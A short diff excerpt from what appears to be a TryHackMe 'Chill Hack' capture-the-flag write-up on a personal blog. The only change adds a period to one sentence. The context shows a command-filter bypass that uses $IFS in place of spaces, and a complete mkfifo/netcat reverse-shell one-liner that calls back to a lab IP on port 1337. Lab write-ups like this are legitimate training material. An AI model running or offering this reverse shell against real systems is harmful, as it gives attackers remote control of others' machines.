0xVenus/0xVenus.github.io/posts/thm/ChillHack.md

 dope! it has been bypassed. which means we have to replace the spaces with $IFS

-<br> let's pop our sweet reverse shell by starting netcat listener and executing this commands
+<br> let's pop our sweet reverse shell by starting netcat listener and executing this commands.
 ```
 rm$IFS/tmp/f;mkfifo$IFS/tmp/f;cat$IFS/tmp/f|/bin/sh -i 2>&1|nc 10.9.3.145 1337 >/tmp/f
 ```